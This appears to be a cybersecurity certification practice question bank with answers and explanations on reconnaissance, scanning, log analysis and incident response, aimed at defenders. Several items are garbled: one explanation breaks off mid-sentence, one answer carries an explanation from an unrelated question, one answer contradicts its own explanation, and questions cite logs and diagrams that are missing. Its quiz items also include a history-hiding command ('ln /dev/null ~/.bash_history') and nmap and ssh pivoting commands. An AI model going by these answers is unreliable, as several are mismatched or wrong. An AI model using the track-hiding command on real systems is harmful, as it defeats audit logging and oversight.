Chris wants to limit the ability of attackers to conduct passive fingerprinting exercises on his network. Which of the following practices will help mitigate this risk? A.Implement an IPS B.Implement a firewall C.Disable promiscuous mode for NICs D.Enable promiscuous mode for NICs

C.Disable promiscuous mode for NICs Explanation: Passive fingerprinting relies on the ability of a system to capture traffic to analyze. Preventing systems from using promiscuous mode will provide attackers with very little data when performing passive fingerprinting. Both intrusion prevention systems and firewalls can help with active fingerprinting but will do nothing to stop passive fingerprinting

The netflow collector that Sam's security team uses is capable of handling 1 gigabit of traffic per second. As Sam's organization has grown, it has increased its external network connection to a 2 gigabit per second external link and has begun to approach full utilization at various times during the day. If Sam's team does not have new budget money to purchase a more capable collector, what option can Sam use to still collect useful data? A.Enable QoS B.Enable netflow compression C.Enable sampling D.None of the above

C.Enable sampling Explanation: Random or deterministic sampling can help Sam's team capture usable flows despite not being able to handle the full throughput of their network. Random sampling will capture a random packet out of every n packets, with n set by the user. Deterministic sampling simply takes every nth packet that passes through, so Sam might sample the 1st, 11th, 21st and so on. This means that small flows may be missed, but in this case, sampling half of all packets is still possible, meaning most flows will still be captured

Adam knows that netcat is a useful penetration testing tool. Which of the following is not a way that he can use netcat, if he is using it as his only tool? A.File transfer B.Port scanner C.Encrypted shell D.Reverse shell

C.Encrypted shell Explanation: Netcat can act as a relay, file transfer tool, reverse shell, TCP banner grabber, TCP port scanner, and in a multitude of other roles, but it does not include encryption capabilities. If Adam needs to encrypt his data, he will need another tool to perform this task

What term is often used for attackers during a penetration test? A.Black team B.Blue team C.Red team D.Green team

C.Red team Explanation: During penetration tests, red teams are attackers, blue teams are defenders and the white team establishes the rules of engagement and performance metrics for the test

Brian's penetration testing efforts have resulted in him successfully gaining access to a target system. Using the diagram shown here, identify what step occurs at point B in the NIST SP 800-115 process flow: Gaining Access -> B -> System Browsing -> Installing additional tools A.Vulnerability scanning B.Discovery C.Escalating privileges D.Pivoting

C.Escalating privileges Explanation: The NIST process focuses on escalating privileges before browsing the system. If Brian was fortunate enough to compromise an administrative account remotely, he could skip this step, but in most cases, his next step is to find a local exploit or privilege escalation flaw that will allow him to have more control over the system

Charleen is preparing to conduct a scheduled reconnaissance effort against a client site. Which of the following is not typically part of the rules of engagement that are agreed to with a client for a reconnaissance effort? A.Timing B.Scope C.Exploitation methods D.Authorization

C.Exploitation methods Explanation: Reconnaissance efforts do not include exploitation, and Charleen should not expect to need to include exploitation limitations in the rules of engagement. If she was conducting a full penetration test, she would need to make sure she fully understands any concerns or limitations her client has about exploitation of vulnerabilities

While reviewing the auth.log file on a Linux system she is responsible for, Tiffany discovers the following log entries: Which of the following has not occurred? A.A user has attempted to re-authenticate B.PAM is configured for three retries and will reject any additional retries in the same session C.Fail2ban has blocked ssh login attempts D.Root is attempting to log in via ssh from the local host

C.Fail2ban has blocked ssh login attempts Explanation: This output shows a brute-force attack run against the localhost's root account using ssh. This resulted in the root user attempting to re-authenticate too many times, and PAM has blocked the retries. Fail2Ban is not set up for this service; thus, this is the one item that has not occurred. If it was enabled, the fail2ban log would read something like this: -2017-07-11 12:00:00,111 fail2ban:actions: WARNING [ssh] Ban 127.0.0.1 -2017-07-11 12:00:00,111 fail2ban,actions:WARNING [ssh] Unban 127.0.0.1

Lauren wants to use an advanced Google query to search for information that is not readily available as part of her reconnaissance efforts. What term is commonly used to describe these searches? A.Google whacks B.SuperGoogles C.Google dorks D.Google gizmos

C.Google dorks Explanation: Google dorks are advanced search strings that can help locate information that is otherwise difficult to find. They can be used to find things like SQL injections, login pages, links, domain-specific information and a host of other data

What major issue would Charles face if he relied on hashing malware packages to identify malware packages? A.Hashing can be spoofed B.Collisions can result in false positives. C.Hashing cannot identify unknown malware D.Hashing relies on unencrypted malware samples. Use the following network diagram and scenario to answer the next three questions

C.Hashing cannot identify unknown malware Explanation: Relying on hashing means that Charles will only be able to identify the specific versions of malware packages that have already been identified. This is a consistent problem with signature-based detections, and malware packages commonly implement polymorphic capabilities that mean that two instances of the same package will not have identical hashes because of changes meant to avoid signature-based detection systems

Chris operates the point-of-sale network for a company that accepts credit cards and is thus required to be compliant with PCI-DSS. During his regular assessment of the point-of-sale terminals, he discovers that a recent Windows operating system vulnerability exists on all of them. Since they are all embedded systems that require a manufacturer update, he knows that he cannot install the available patch. What is Chris's best option to stay compliant with PCI-DSS and protect his vulnerable systems? A.Replace the Windows embedded point-of-sale terminals with standard Windows systems B.Build a custom operating system image that includes the patch C.Identify, implement, and document compensating controls D.Remove the POS terminals from the network until the vendor releases a patch.

C.Identify, implement, and document compensating controls Explanation: When a vulnerability

Adam is reviewing his organization's security footprint by conducting reconnaissance activities. After reviewing a list of Google dorks, he runs the following search: 'mysqli_connect' ext:inc A.Block MySQL connections from remote hosts B.Initiate the organization's incident response process C.Immediately change MySQL passwords and review configurations D.Change all MySQL connection strings

C.Immediately change MySQL passwords and review configurations Explanation: If this Google search returns information, it will show MySQL connection information, including passwords. Adam should immediately report this finding to management and should recommend that all exposed passwords be changed immediately, that the misconfiguration that resulted in the files being exposed be fixed, and that the reason it occurred be identified. This does not tell you whether MySQL services are exposed remotely and does not mean that an incident has already occurred. At this point, Adam only knows that a misconfiguration has occurred. Changing all of the connection strings won't fix the root issue

While reviewing the command history for an administrative user, Chris discovers a suspicious command that was captured, shown here: ln /dev/null ~/.bash_history What action was this user attempting to perform? A.Enabling the bash history B.Appending the contents of /dev/null to the bash history C.Logging all shell commands to /dev/null D.Allowing remote access from the null shell

C.Logging all shell commands to /dev/null Explanation: This command will prevent commands entered at the bash shell prompt from being logged, as they are all sent to /dev/null. This type of action is one reason that administrative accounts are often logged to remote hosts, preventing malicious insiders or attackers who gain administrative access from hiding their tracks

Chris has been asked to assess the technical impact of suspected reconnaissance performed against his organization. He is informed that a reliable source has discovered that a third party has been performing reconnaissance by querying WHOIS data. How should Chris categorize the technical impact of this type of reconnaissance? A.High B.Medium C.Low D.He cannot determine this from the information given

C.Low Explanation: Chris knows that domain registration information is publicly available and that his organization controls the data that is published. Since this does not expose anything that he should not expect to be accessible, Chris should categorize this as low impact

Tiffany needs to assess the patch level of a Windows 2012 server and wants to use a freely available tool to check the system for security issues. Which of the following tools will provide the most detail about specific patches installed or missing from her machine? A.nmap B.Nessus C.MBSA D.Metasploit

C.MBSA Explanation: The Microsoft Baseline Security Analyzer (MBSA) is a tool provided by Microsoft that can identify installed or missing patches as well as common security misconfigurations. Incorrect answers: A.nmap and B.Nessus: Since MBSA is run with administrative rights, it will provide a better view than normal nmap and Nessus scans and provides more detailed information about specific patches that are installed. D.Metasploit provides some limited scanning capabilities but is not the best tool for the situation

Jennifer is an Active Directory domain administrator for her company and knows that a quickly spreading botnet relies on a series of domain names for command and control and that preventing access to those domain names will cause the malware infection that connects to the botnet to fail to take further action. Which of the following actions is her best option if she wants to prevent off-site Windows users from connecting to botnet command and control systems? A.Force a BGP update B.Set up a DNS sinkhole C.Modify the hosts file D.Install an anti-malware application

C.Modify the hosts file Explanation: Jennifer can push an updated hosts file to her domain-connected systems that will direct traffic intended for known bad domains to the localhost or a safe system. She might want to work with a security analyst or other IT staff member to capture queries sent to that system to track any potentially infected workstations. A DNS sinkhole would work only if all the systems were using local DNS; off-site users are likely to have DNS settings set by the local networks they connect to. Anti-malware applications may not have an update yet or may fail to detect the malware, and forcing a BGP update for third-party networks is likely a bad idea

Attackers have been attempting to log into Alaina's Cisco routers, causing thousands of log entries, and she is worried they may have eventually succeeded. Which of the following options should she recommend to resolve this issue? A.Prevent console login via ssh B.Implement a login-block feature with back-off settings C.Move the administrative interface to a protected network D.Disable console access entirely

C.Move the administrative interface to a protected network Explanation: Best practice for most network devices is to put their administrative interfaces on a protected network. Many organizations then require administrators to connect via a jump box, adding another layer of protection. Preventing console access is typically not desirable in case changes need to be made and a GUI is not available; login-block can help but will only slow down attacks and will not prevent them

A port scan of a remote system shows that port 3306 is open on a remote database server. What database is the server most likely running? A.Oracle B.Postgres C.MySQL D.Microsoft SQL

C.MySQL Explanation: MySQL uses port 3306 as its default port. Incorrect answers: A.Oracle - Oracle uses port 1521. B.Postgres - Postgres uses 5432. D.Microsoft SQL - Microsoft SQL uses 1433/1434

During her normal daily review process, Jennifer detects an external system that is systematically conducting traceroute operations to each of the systems and devices in her network. What activity is most likely occurring? A.A regularly scheduled network scan from her company's ISP. B.A vulnerability scan C.Network topology reconnaissance D.Router probes to determine the best routes via BGP discovery

C.Network topology reconnaissance Explanation: Gathering traceroute information about each system in a network can help provide insight into the network's topology, including where routers, switches, and other devices may be located. It is not typical for ISPs to conduct unannounced scans, vulnerability scans would include additional scan traffic, and routers do not probe individual systems for BGP discovery

During Geoff's configuration of his organization's network access control policies, he sets up client OS rules that include the following statements: ALLOW Windows 7 version *, Windows 10 version * ALLOW OSX version * ALLOW iOS 8.1, iOS 9 version * ALLOW Android 7.* After deploying this rule, he discovers that many devices on his network cannot connect. What issue is most likely occurring? A.Insecure clients B.Incorrect NAC client versions C.OS version mismatch D.Patch-level mismatch

C.OS version mismatch Explanation: Geoff built a reasonable initial list of operating system versions, but many devices on a modern network will not match this list, causing operating system version mismatch issues with the matching rules he built. He may need to add broader lists of acceptable operating systems, or his organization may need to upgrade or replace devices that cannot be upgraded to acceptable versions

John needs to protect his organization's authentication system against brute-force attacks. Which of the following control pairs are best suited to preventing a brute-force attack from succeeding if ease of use and maintenance is also important? A.Passwords and PINs B.Passwords and biometrics C.Passwords and token-based authentication D.Token-based authentication and biometrics

C.Passwords and token-based authentication Explanation: A password combined with token-based authentication can prevent brute-force attacks that might succeed against a password or a password and PIN combination. Biometric factors are useful but often have significant maintenance and deployment overhead and are typically more difficult to use than a token-based second factor

Alex has been asked to investigate a call to one of his organization's system administrators that is believed to have led to a breach. The administrator described that call by saying that the caller identified themselves as the assistant to the director of sales and said that they needed access to a file that was critical to a sales presentation with a major client but that their laptop had died. The administrator provided a link to the file, which included the organization's sales data for the quarter. What type of social engineering occurred? A.Baiting B.Quid pro quo C.Pretexting D.Whaling

C.Pretexting Explanation: This is an example of pretexting, which relies on creating a scenario that the victim will believe, resulting in the attacker gaining access. Incorrect answers: Baiting uses an item or something that the user desires to cause them to fall for a phishing-style attack. Quid pro quo promises a benefit in exchange for information. Whaling is a phishing attack specifically aimed at important users

Brandon wants to perform a WHOIS query for a system he believes is located in Europe. Which NIC should he select to have the greatest likelihood of success for his query? A.AFRINIC B.APNIC C.RIPE D.LACNIC

C.RIPE Explanation: Brandon should select RIPE, the regional Internet registry for Europe, the Middle East, and parts of Central Asia. Incorrect answers: AFRINIC serves Africa. APNIC serves Asia/Pacific. LACNIC serves Latin America and the Caribbean

If Lauren runs a scan from location B that targets the servers on the data center network and then runs a scan from location C, what differences is she most likely to see between the scans? A.The scans will match B.Scans from location C will show no open ports C.Scans from location C will show fewer open ports D.Scans from location C will show more open ports

C.Scans from location C will show fewer open ports Explanation: Most data center firewalls are configured to only allow ports for publicly accessible services through to other networks. Location C is on an internal network, so Lauren will probably see more ports than if she tried to scan data center systems from location A, but it is likely that she will see far fewer ports than a port scan of the data center from inside the data center firewall will show

While conducting reconnaissance of his organization, Chris discovers that multiple certificates are self-signed. What issue should he report to his management? A.Self-signed certificates do not provide secure encryption for site visitors B.Self-signed certificates can be revoked only by the original creator C.Self-signed certificates will cause warnings or error messages D.None of the above

C.Self-signed certificates will cause warnings or error messages Explanation: Using self-signed certificates for services that will be used by the general public or organizational users outside of a small testing group can be an issue because they will result in an error or warning in most browsers. The TLS encryption used for HTTPS will remain just as strong regardless of whether the certificate is provided by a certificate authority or self-signed, and a self-signed certificate cannot be revoked at all

Geoff wants to prevent spammers from harvesting his organization's public LDAP directory. What technology should he implement? A.Firewall B.An IDS C.Set hard limits D.Require authentication

C.Set hard limits Explanation: LDAP directory servers typically support both soft and hard limits on queries, including the size of the query and how many queries can be conducted in a given time period. Setting a hard limit prevents LDAP users from exceeding the number set. A firewall would be useful to prevent access, and an IDS could show abuse. Requiring authentication isn't useful for a public service

As part of his reconnaissance effort, Chris enters usernames from public information about a company into a site like checkusernames.com and receives information like the results shown here. What type of action is he performing? A. Social engineering B.Brute-force username guessing C.Social media profiling D.Phishing

C.Social media profiling Explanation: Chris is performing a type of social media profiling. While common usernames may not tell him very much, unique usernames or those commonly used by a specific target can help him gather more information about the sites his targets use

During his analysis of a malware sample, John reviews the malware files and binaries without running them. What type of analysis is this? A.Automated analysis B.Dynamic analysis C.Static analysis D.Heuristic analysis

C.Static analysis Explanation: John is performing static analysis, which is analysis performed without running code. He can use tools or manually review the code (and, in fact, is likely to do both)

As part of a penetration testing exercise, Lauren is placed on the defending team for her organization. What is this team often called? A.The red team B.The white team C.The blue team D.The yellow team

C.The blue team Explanation: Internal security teams are typically referred to as the blue team for penetration testing and security exercises. Red teams are attackers, while the white team establishes the rules of engagement and performance metrics for the test

While reviewing Shodan scan data for his organization, John notices the following entry. 'Please try to use SSHv1 for your sessions to avoid transmitting passwords in the clear over the net.' Which of the following is false? A.The device allows telnet connections B.There is a console port on a nonstandard port C.The device requires sshv1 D.The device is an automated tank gauge

C.The device requires sshv1 Explanation: The device allows a telnet connection to port 10001 and identifies itself as an automated tank gauge. John should recommend disabling telnet or protecting the device with a firewall or other security device to prevent unauthorized remote access

Ron is reviewing his team's work as part of a reconnaissance effort and is checking Wireshark packet captures. His team reported no open ports on 10.0.2.15. What issue should he identify with their scan based on the capture shown here? A.The host was not up B.Not all ports were scanned C.The scan scanned only UDP ports D.The scan was not run as root

C.The scan scanned only UDP ports Explanation: This scan shows only UDP ports. Since most services run as TCP services, this scan wouldn't have identified most common services. Ron should review the commands that his team issued as part of their exercise. If he finds that nmap was run with a -sU flag, he will have found the issue

While attempting to stop a rogue service, Monica issues the following Linux command on an Ubuntu system using upstart: service rogueservice stop After a reboot, she discovers the service running again. What happened, and what does she need to do to prevent this? A.The service restarted at reboot; she needs to include the "-p", or permanent flag B.The service restarted itself; she needs to delete the binary associated with the service C.The service restarted at reboot; she should add an .override file to stop the service from starting D.A malicious user restarted the service; she needs to ensure users cannot restart services

C.The service restarted at reboot; she should add an .override file to stop the service from starting Explanation: Monica issued a command that only stops a running service. It will restart at reboot unless the scripts that start it are disabled. On modern Ubuntu systems, that is handled by 'upstart'. Other services may use init.d scripts. In either case, when asked a question like this, you can quickly identify this as a problem that occurred at reboot and remove the answers that aren't likely to be correct

While reviewing web server logs, Danielle notices the following entry. What occurred? '10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= total 200' A.A theme was changed B.A file was not found C.There was an attempt to edit the 404 page D.The 404 page was displayed

C.There was an attempt to edit the 404 page Explanation: Attackers often use built-in editing tools that are inadvertently or purposefully exposed to edit files to inject malicious code. In this case, someone has attempted to modify the 404 file displayed by WordPress. Anybody who received a 404 error from this installation could have been exposed to malicious code inserted into the 404 page or simply a defaced 404 page

Why does the US government require Trusted Foundry and related requirements for technology? A.To control prices B.To ensure standards compatibility C.To prevent hardware-level compromise of devices D.To ensure US-based supplier viability for strategic components

C.To prevent hardware-level compromise of devices Explanation: According to the Defense Microelectronics Activity (DMEA) website: "DMEA accredits suppliers in the areas of integrated circuit design, aggregation, broker, mask manufacturing, foundry, post processing, packaging, assembly and test services. These services cover a broad range of technologies and is intended to support both new and legacy applications, both classified and unclassified." This program acts to ensure that electronics are not compromised as part of the design process

A system that Jeff is responsible for has been experiencing consistent denial-of-service attacks using a version of the Low Orbit Ion Cannon (LOIC) that leverages personal computers in a concerted attack by sending large amounts of traffic from each system to flood a server, thus making it unable to respond to legitimate requests. What type of firewall rule should Jeff use to limit the impact of a tool like this if bandwidth consumption from the attack itself is not the root problem? A.IP-based blacklisting B.Drop all SYN packets C.Use a connection-rate or volume-limiting filter per IP D.Use a route-blocking filter that analyzes common LOIC routes

C.Use a connection-rate or volume-limiting filter per IP Explanation: Since LOIC can leverage hundreds or thousands of hosts, limiting each connecting host to a connection rate and volume through filters like those provided by the iptables hashlimit plug-in can help. IP-based blacklisting may work for smaller botnets but is difficult to maintain for larger attacks and may eventually block legitimate traffic. Dropping all SYN packets would prevent all TCP connections, and route-blocking filters are not a method used to prevent this type of attack. While he's setting up firewall rules, Jeff may also want to investigate a denial-of-service mitigation partner or service in case the attackers move to more advanced methods or do overwhelm his link

After a popular website is hacked, Chris begins to hear reports that email addresses from his company's domain are listed in the hackers' data dump. Chris knows that the list includes passwords and is concerned that his users may have used the same password for the site and their own accounts. If the hackers recovered MD5 hashed passwords, how can he check them against the strong password hashes his company uses? A.Reverse the MD5 hashes and then rehash using the company's method and compare B.Reverse the MD5 and strong company hashes and then compare the passwords C.Use rainbow tables to recover the passwords from the dump and then rehash using the company's strong method and compare D.Chris cannot accomplish this task; hashes cannot be reversed

C.Use rainbow tables to recover the passwords from the dump and then rehash using the company's strong method and compare Explanation: Rainbow tables exist for most reasonable MD5 passwords, which means that Chris can likely recover the majority of the passwords belonging to his users relatively quickly. Once he is done, he can apply his company's strong hashing method and compare them to the existing hashed passwords his organization stores. He may still be better off simply asking all of the impacted users to change their passwords if they reused them for the site and should consider multifactor authentication to avoid the issue in the future

Allan needs to immediately shut down a service called Explorer.exe on a Windows server. Which of the following methods is not a viable option for him? A.Use sc B.Use wmic C.Use secpol.msc D.Use services.msc

C.Use secpol.msc Explanation: Windows services can be started and stopped using sc (sc stop 'service') or wmic (wmic service where name='service' call ChangeStartmode Disabled) or via the services.msc GUI. secpol.msc controls security policy and will not allow Allan to stop a service

Laura's organization has been receiving a large amount of spam email sent specifically to the email addresses listed in her organization's domain registrations. Which of the following techniques will help her organization limit this type of spam? A.DNS query rate limiting B.CAPTCHAs C.Using a proxy service D.Blacklisting

C.Using a proxy service Explanation: While spam to a registrant's email address may seem trivial, it may mean that important messages related to the domain are missed. The best way to limit this is to use a privacy or proxy service to register the domain. Many, if not most, popular registration services offer a privacy service, sometimes at an extra charge. Unfortunately, if a domain was previously registered before privacy services or proxies are used, that information can be looked up and used

Tracy believes that a historic version of her target's website may contain data she needs for her reconnaissance. What tool can she use to review snapshots of the website from multiple points in time? A.Time Machine B.Morlock C.Wayback Machine D.Her target's web cache

C.Wayback Machine Explanation: The Wayback Machine and similar sites capture periodic snapshots of websites from across the Internet, allowing penetration testers and others performing reconnaissance activities to gather information from historic versions of their target sites. This also means that long-term data breaches may be archived in sites like these in addition to search engine caches

Selah suspects that the Linux system she has just logged into may be Trojaned and wants to check where the bash shell she is running is being executed from. What command should she run to determine this? A.where bash B.ls -l bash C.Which bash D.printev bash

C.Which bash Explanation: The which command will show Selah where the bash executable is being run from, typically /bin/bash. If she finds that bash is running from a user directory or somewhere else suspicious, she should immediately report it. If you're familiar with the printenv command, option D may be tricky; printev doesn't accept specific flags, so Selah would need to pipe the output to grep or search it manually to find bash there

Alex has been asked to assess the likelihood of reconnaissance activities against her organization (a small, regional business). Her first assignment is to determine the likelihood of port scans against systems in her organization's DMZ. How should she rate the likelihood of this occurring? A.Low B.Medium C.High D.There is not enough information for Alex to provide a rating

C.High Explanation: Alex knows that systems that are exposed to the Internet like DMZ systems are constantly being scanned. She should rate the likelihood of the scan occurring as high. In fact, there is a good chance that a scan will be occurring while she is typing up her report

Alex wants to list all of the NetBIOS sessions open on a workstation. What command should he issue to do this? A. nbstat -o B.nbstat -r C.nbstat -s D.nbstat -c

C.nbstat -s Explanation: To show current NetBIOS sessions and their status, Alex can issue the nbstat -s command. Incorrect answers: The -c flag shows the NetBIOS name cache, while the -r flag displays the count of NetBIOS names resolved through a WINS server query and by broadcast. There is no -o flag

Lauren wants to identify all the printers on the subnets she is scanning with nmap. Which of the following nmap commands will not provide her with a list of likely printers? A.nmap -sS -p 9100,515,631 10.0.10.15/22 -oX printers.txt B.nmap -O 10.0.10.15/22 -oG - | grep printer >> printers.txt C.nmap -sU -p 9100,515,631 10.0.10.15/22 -oX printers.txt D.nmap -sS -O 10.0.10.15/22 -oG | grep >> printers.txt

C.nmap -sU -p 9100,515,631 10.0.10.15/22 -oX printers.txt D.nmap -sS -O 10.0.10.15/22 -oG | grep >> printers.txt Explanation: Using a UDP scan, as shown in option C, with the -sU flag will not properly identify printers since print service ports are TCP ports. The other commands will properly scan and identify many printers based on either their service ports (515,631,9100) or their OS versions

While reviewing netflows for a system on her network, Alice discovers the following traffic pattern. What is occurring? A.telnet scan B.ssh scan C.ssh scan with unsuccessful connection attempts D.sftp scans with unsuccessful connection attempts

C.ssh scan with unsuccessful connection attempts Explanation: TCP port 22 indicates that this is most likely an ssh scan, and the single packet with no response traffic indicates unsuccessful connection attempts. If the system is not normally used for scanning for open ssh servers, Alice should look into why it is behaving this way

While conducting reconnaissance, Greg discovers what he believes is an SMTP service running on an alternate port. What technique should he use to manually validate his guess? A.Send an email via the open port B.Send an SMTP probe C.telnet to the port D.ssh to the port

C.telnet to the port Explanation: Using telnet to connect to remote services to validate their response is a useful technique for service validation. It doesn't always work but can allow you to interact with the service to gather information manually

While conducting active reconnaissance, Lauren discovers a web remote management application that appears to allow Windows command-line access on a server. What command can she run to quickly determine what user the service is running as? A.username B.showuser C.whoami D. cd c:\Users\%currentuser

C.whoami Explanation: The whoami command will show the username and its domain. This can be useful when determining whether a service is running as a user or a service account

An access control system that relies on the operating system to constrain the ability of a subject to perform operations is an example of what type of access control system? A.A discretionary access control system B.A role-based access control system C.A mandatory access control system D.A level-based access control system

C.A mandatory access control system Explanation: A mandatory access control system relies on the operating system to constrain what actions or access a subject can perform on an object. Incorrect answers: Role-based access control uses roles to determine access to resources. Discretionary access control allows subjects to control access to objects that they own or are responsible for. Level-based access control is a type of role-based access control

While reviewing Apache logs, Cynthia notices the following log entries. What has occurred? 10.0.1.1 - POST /wordpres/wp-content/r57.php?1 200 10.0.1.1 - GET /wordpress/wp-content/r57 .php 200 A.A file was downloaded and verified B.A file was emailed C.A file was moved to the wp-content directory D.A file was uploaded and verified

D. A file was uploaded and verified Explanation: The POST shows a file being uploaded, and the GET shows an attempt to retrieve it. If Cynthia doesn't expect her system to allow uploads, she should check into what occurred. If she searches for r57.php, she will become much more concerned; it is a remote access tool

Jarret needs to protect an application server against resource exhaustion attacks. Which of the following techniques is best suited to surviving a large-scale DDoS? A.Enable application sharding B.Review each query and implement query optimization C.Implement aggressive aging at the organization's firewall D.Employ a CDN

D. Employ a CDN Explanation: While application sharding and query optimization can help services respond under heavy loads, Jarret's best bet is to work with a content distribution network (CDN) that has built-in DDoS mitigation technologies. This will allow his content to be accessible even if his primary service is taken offline and will spread the load to other servers during attacks, even if the CDN's anti-DDoS capabilities can't entirely mitigate the attack. Incorrect answers: Aggressive aging can help when implemented on a firewall and may help somewhat with survivability but is less useful for large-scale DDoS attacks

Geoff needs to lock down a Windows workstation that has recently been scanned using nmap with the results shown here. He knows that the workstation needs to access websites and that the system is part of a Windows domain. What ports should he allow through the system's firewall for externally initiated connections? A. 80, 135, 139, and 445 B.80, 445, and 3389 C.135, 139, and 445 D. No ports should be open

D. No ports should be open Explanation: The uses described for the workstation that Geoff is securing do not require inbound access to the system on any of these ports. Web browsing and Active Directory domain membership traffic can be handled by traffic initiated by the system

Sharon wants to gather email addresses as part of her reconnaissance efforts. Which of the following tools best suits her needs? A.nmap B.cree.py C.MailSnarf D.TheHarvester

D.TheHarvester Explanation: TheHarvester is an email collection tool that can automatically gather email addresses from a domain, website, or other source. nmap does not provide an email gathering capability. cree.py is a geolocation tool. MailSnarf was made up for this question

While investigating a compromise, Glenn encounters evidence that a user account has been added to the system he is reviewing. He runs a diff of /etc/shadow and /etc/passwd and sees the following output. What has occurred? A.The root account has been compromised B.An account named daemon has been added C.The shadow password file has been modified D./etc/shadow and /etc/passwd cannot be diffed to create a useful comparison

D./etc/shadow and /etc/passwd cannot be diffed to create a useful comparison Explanation: Linux and Unix systems typically keep user account information stored in /etc/passwd, while /etc/shadow contains password hashes and account expiration information. Because the two files hold different data, using diff between them is not a useful strategy in this scenario.

Alex wants to scan a protected network and has gained access to a system that can communicate with both his scanning system and the internal network, as shown in the image here. What type of nmap scan should Alex conduct to leverage this host if he cannot install nmap on system A? A.A reflection scan B.A proxy scan C.A randomized host scan D.A ping-through scan

D.A ping-through scan Explanation: While the hostnames cluster1 and cluster1a indicate that there may be a cluster of mail servers, this query does not prove that. Instead, Charleen knows that there are two MX entries for her target. She will also notice that mail hosting is handled by messagelabs, a software-as-a-service provider for email and other managed services, indicating that the public email presence for her target is handled by a specialized company. MXToolbox allows deeper queries about blacklists and SMTP tests, but this image only shows the links to them and does not provide details.

Fred conducts an SNMP sweep of a target organization and receives no-response replies from multiple addresses that he believes belong to active hosts. What does this mean? A.The machines are unreachable B.The machines are not running SNMP servers C.The community string he used is invalid D.Any or all of the above may be true

D.Any or all of the above may be true Explanation: Since SNMP does not reliably report on closed UDP ports and SNMP servers don't respond to requests with invalid community strings, any of these answers could be true. This means that receiving "no response" to an SNMP query can mean that the machines are unreachable (often due to a firewall), they are not running SNMP, or the community string that was used is incorrect.

Which of the following items is not typically included in the rules of engagement for a penetration test? A.Timing B.Authorization C.Scope D.Authorized tools

D.Authorized tools Explanation: The rules of engagement for a penetration test typically describe the scope, timing, authorization, and techniques that will be used (or that are prohibited). This helps to ensure that unexpected impacts are minimized and allows both the tester and the target organization to understand what will occur. Specifically listing authorized tools is not typical for most rules of engagement.

Lucy configures an alert that detects when users who do not typically travel log in from other countries. What type of analysis is this? A.Trend B.Availability C.Heuristic D.Behavior

D.Behavior Explanation: Lucy has configured a behavior-based detection. It is likely that a reasonable percentage of the detections will be for legitimate travel by users who typically do not leave the country, but pairing this detection with other behavioral or anomaly detections can help determine whether a given login is legitimate.

While reviewing the filesystem of a potentially compromised system, Angela sees the following output when running ls -la. What should her next action be after seeing this? A.Continue to search for other changes B.Run diff against the password file C.Immediately change her password D.Check the passwd binary against a known good version

D.Check the passwd binary against a known good version Explanation: The passwd binary stands out as having recently changed. This may be innocuous, but if Angela believes the machine was compromised, there is a good chance the passwd binary has been replaced with a malicious one. She should check the binary against a known good version and then follow her incident response process if it doesn't match.

Isaac wants to prevent hosts from connecting to known malware distribution domains. What type of solution can he use to do this without deploying endpoint protection software or an IPS? A.Route poisoning B.Anti-malware router filters C.Subdomain whitelisting D.DNS blackholing

D.DNS blackholing Explanation: DNS blackholing uses a list of known malicious domains or IP addresses and relies on listing the domains on an internal DNS server, which provides a fake reply. Incorrect answers: Route poisoning prevents networks from sending data to a destination that is invalid. Routers do not typically have an anti-malware filter feature. Subdomain whitelisting was made up for this question.

As part of her malware analysis process, Caitlynn diagrams the high-level functions and processes that the malware uses to accomplish its goals. What is this process known as? A.Static analysis B.Composition C.Dynamic analysis D.Decomposition

D.Decomposition Explanation: Caitlynn is preparing a decomposition diagram that maps the high-level functions to lower-level components. This will allow her to better understand how the malware package works and may help her identify areas she should focus on.

Isaac wants to grab the banner from a remote web server using commonly available tools. Which of the following tools cannot be used to grab the banner from the remote host? A.netcat B.telnet C.wget D.FTP

D.FTP Explanation: netcat, telnet, and wget can all be used to conduct Isaac's banner-grabbing exercise. FTP will not connect properly to get the banner he wants to see.

As part of his active reconnaissance activities, Frank is provided with a shell account accessible via ssh. If Frank wants to run a default nmap scan on the network behind the firewall shown here, how can he accomplish this? A.ssh -t 192.168.34.11 nmap 192.168.34.0/24 B.ssh -R 8080:192.168.34.11:8080 [remote account:remote password] C.ssh -proxy 192.168.11 [remote account:remote password] D.Frank cannot scan multiple ports with a single ssh command

D.Frank cannot scan multiple ports with a single ssh command Explanation: While ssh port forwarding and ssh tunneling are both useful techniques for pivoting from a host that allows access, nmap requires a range of ports to be forwarded for its default scans. He could write a script and forward the full range of ports that nmap checks, but none of the commands listed will get him there. If Frank has access to proxychains, he could do this with two commands.

During an on-site penetration test of a small business, Bob scans outward to a known host to determine the outbound network topology. What information can he gather from results provided by Zenmap? A.There are two nodes on the local network B.There is a firewall at IP address 96.120.24.121 C.There is an IDS at IP 96.120.24.121 D.He should scan the 10.0.2.0/24 network

D.He should scan the 10.0.2.0/24 network Explanation: This scan shows Bob that he is likely on a network using some portion of the 10.0.0.0/8 private IP space. An initial scan of the 10.0.2.0/24 network to determine what is near him would be a good start. Since the Zenmap scan was run to a single external host, it will not show other hosts on the local network, so there may be more than two nodes on the network. Bob cannot make determinations about what the host at 96.120.24.121 is, beyond its being a device on the route between the local host and his remote scan destination.

Charles wants to detect port scans using syslog so that he can collect and report on the information using his SIEM. If he is using a default CentOS system, what should he do? A.Search for use of privileged ports in sequential order B.Search for connections to ports in the /var/syslog directory C.Log all kernel messages to detect scans D.Install additional tools that can detect scans and send the logs to syslog

D.Install additional tools that can detect scans and send the logs to syslog Explanation: Detecting port scans requires the ability to identify scanning behavior, and the applications that create syslog entries on most default Linux distributions are not set up for this. Charles should identify a tool like psad, an IDS package, or another tool that can track connections and scan behavior and report on it, and then use syslog to send those messages to his log collector or SIEM.

As part of an organization-wide red team exercise, Frank is able to use a known vulnerability to compromise an Apache web server. Once he has gained access, what should his next step be if he wants to use the system to pivot to protected systems behind the DMZ that the web server resides in? A.Vulnerability scanning B.Privilege escalation C.Patching D.Installation of additional tools

D.Installation of additional tools Explanation: By default, Apache does not run as an administrative user. In fact, it typically runs as a limited user. To take further useful action, Frank should look for a privilege escalation path that will allow him to gain further access.

Ryan's passive reconnaissance efforts resulted in the following packet capture. Which of the following statements cannot be verified based on the packet capture shown for the host with IP address 10.0.2.4? A.The host does not have a DNS entry B.It is running a service on port 139 C.It is running a service on port 445 D.It is a Windows system

D.It is a Windows system Explanation: While the system responded on common Windows ports, you cannot determine whether it is a Windows system. It did respond, and both ports 139 and 445 were accessible. When the host the Wireshark capture was conducted from queried DNS, it did not receive a response, indicating that the system does not have a DNS entry (or at least, it doesn't have one that is available to the host that did the scan and ran the Wireshark capture).

